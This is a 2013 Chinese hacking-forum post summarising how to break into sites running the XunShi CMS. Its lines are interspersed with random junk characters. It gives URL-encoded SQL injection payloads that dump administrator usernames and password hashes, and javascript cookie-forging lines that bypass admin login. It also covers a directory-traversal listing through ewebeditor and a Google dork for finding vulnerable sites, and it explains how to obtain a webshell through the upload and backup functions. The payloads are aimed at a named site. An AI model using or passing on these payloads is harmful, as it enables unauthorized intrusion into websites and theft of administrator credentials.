找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2698|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘- l4 P) e% x9 v6 k5 {
. Y1 S( N2 M7 n
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
) \9 I1 |/ O/ I  a- l9 ]! |' |! j: ~6 g& `# p  \- \, x
以下本文总结来自黑防去年第9期杂志上的内容...
6 k0 h) W7 B% y" n* k, y/ T: o8 h7 H2 G9 Z$ o: ^# @, e8 [+ i+ }
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
9 i  ]) \; W( O9 z% o/ I" H! r  Q$ c+ U4 X3 N1 J  n3 l% C
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
' @5 B( p: f3 P; J
# u2 Q" x3 z' ^4 \6 x记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况3 L  v* M$ O) K- h
这里一个注入7 X) A' q8 x. Z/ s. l, E1 W2 e; r0 W

/ q3 X2 N3 m  W' J0 {& J+ |* B效果如图:
! |" I5 c4 F5 q# D+ Z( r. o- f" x3 L/ a9 H% g, |
/ L% J& @  }- _- m5 R

3 C8 u' n/ k) V5 i2 B这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.: `5 s! m( ^9 n  o, V, h

8 K1 Z6 O: ^( _$ v: a  [密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
1 J: y" B7 O) P9 f$ \' [4 I5 X& k' ^5 g3 u
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
; f5 \# e) C1 w( e, {8 d( s
( v" b# B: h" t" D" p( v: o" @那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
2 j" I$ H4 |' Z
2 R$ w! Q, y/ P: l3 u因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞% R5 ]8 M$ ^* Z9 ~# l  f
, P( W, O( x7 i# A# c( j
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
# H! X4 Z3 S# `- h' M" j# z& ^2 [+ y" {& W' J, J9 ^9 f& `
访问这页面来列目录..步骤如下:0 U- g2 F. Q& N) @* h

( \7 Y# x- O9 j' P# D7 h( djavascript:alert(document.cookie="admindj=1")
+ e( d% P+ d. L! l+ c% v
% u2 z7 ~7 ~9 h; p5 Rhttp://www.political-security.co ... asp?id=46&dir=../..
! J6 J6 V3 U3 w, [6 N5 M
$ }/ `, ^) q- p) O效果如图:9 J- z, h; X' b! p

" T8 s  b( L' Z/ `. V" z( L4 ?
7 a" k+ B) o7 P, R/ u( O7 q2 x+ e1 {4 d* _. V4 Y$ f' s  x* L
这样全站目录都能瞧了..找到后台目录..进去..5 [( F8 u1 W* j& W) J7 E

: M+ Z  Z( Z; q  U4 w那么进了后台怎么拿shell??上传--备份就ok了..
8 h7 U0 |: {7 u, A8 l5 P2 y
/ a( X3 X% Y- l- y  M* t* q$ b4 U: D那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
8 L/ P7 W) T1 m0 f5 s" P% `6 r
  r* L8 C1 u2 Y$ R这个我也碰到过一次..你都可以通过列目录来实现..+ e' w6 y! k) C& J
- Z( _( @' h$ T
javascript:alert(document.cookie="admindj=1")
# J2 X" _$ S8 w( }; u3 z) j
+ Q2 o+ r1 S7 y, J" ^  Z! T: v# p% ahttp://www.political-security.co ... p?action=BackupData
) h* \4 k* J# O1 `8 P) a4 G7 K! W7 q) S2 ?" E. P# ~4 P% m
备份ok..
8 C" ~9 t. W8 p; W( P
0 b7 }. I# O+ h0 W那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?- Q4 v9 d) j& D% D5 K- Y

# o: _6 R' a( q4 o在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下: q2 S7 s  {: r$ l

8 v. `# o8 A6 V6 P然后访问此页面进行注入..步骤如下:
- b5 y3 [/ y: L/ z) F. g1 p# a" |# k4 N" ~5 W% X: H
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
- V0 N7 g4 ~7 i0 l, ^. L6 w: a0 h8 D$ Y! M, G" u6 e
然后请求admin/admin_chk.asp页面
- y2 a3 l9 [% o; \) @6 j) {) R
: A# }4 c9 ~! T# K输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
' l; e6 k1 N6 H
- e1 A8 M  b6 K3 j6 p; F9 Y3 a26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin! y; c, _7 G+ q+ X% l
1 ]6 Q* U  V% d& k( `
效果如图所示:. Q, p; A( y( @1 o0 ]
  N9 W9 W) N# k0 O' S3 y

5 W- u% [- ~: H
3 y  p9 b- t6 Y. u  z# }3 ~讯时漏洞2! |& G# r( R, n$ x. r4 l" B
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
3 a& M$ j9 N% P2 B1 s% W0 @ ! w% e2 P; t3 ~+ d" D  p
1、/admin/admin_news_pl_view.asp?id=1
( @/ A4 P* _/ `2 b//id任意 填入以下语句/ X6 N7 S0 r: m4 C# ]% Z0 K
3 D; @* F  n) r# x2 S1 @) a
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!" K  x1 n) S7 m, K0 i3 i
; b2 X9 {  ~0 e7 _8 [# D! u
: b, G$ r2 v  Q# }. r4 j  m

7 z8 Y. M; K7 R6 G$ q2 u5 B3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='* a  k9 Q8 g1 D9 {

8 z% d( e1 r' r/ X  G" D% N& s8 B' t

) H' f* K- u  z1 V1 q( U  E8 j爆出管理员帐号和密码了1 ]4 |2 J7 w1 a

/ K$ z8 `; s( i8 _1 G
+ K. r" {5 P+ }( N
4 b2 l& K( P& E' e& p4 M4、cookies进后台7 p, R7 T" Z% c" U; F! |
1 k7 b5 C# V! H9 E
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));0 X3 d" W7 P4 N9 I( `4 V$ U3 ?3 P' ~

* }8 S4 X1 G4 b3 w* h8 {; v9 E
$ @2 f) h, P0 |# w2 V8 P( u& @6 H" L# {, p* s. A( A+ O% Y1 F9 V
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!. n  W$ d2 s6 X9 g4 D7 V+ P
# k; h, [' ?: w0 y; k' o; y  |
5 s2 e+ M  @3 }' O0 f* a) ^% Z

: E: x( T4 _* }3 {5 O- J, V# ^2 I6、后台有上传和备份取SHELL不难。% `. k7 `% a! K( P$ j

# i4 N& R* C2 f/ v6 }7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
8 y6 I2 C, Y" k$ }# p
& E  e7 B1 A3 Q% s3 k逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
# a! r; y  Z& C- U  v
0 ?4 z$ d, m" @* t6 S
! N) b4 a7 S3 T9 \1 E/ Q* |, X) B- D7 V- @/ \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表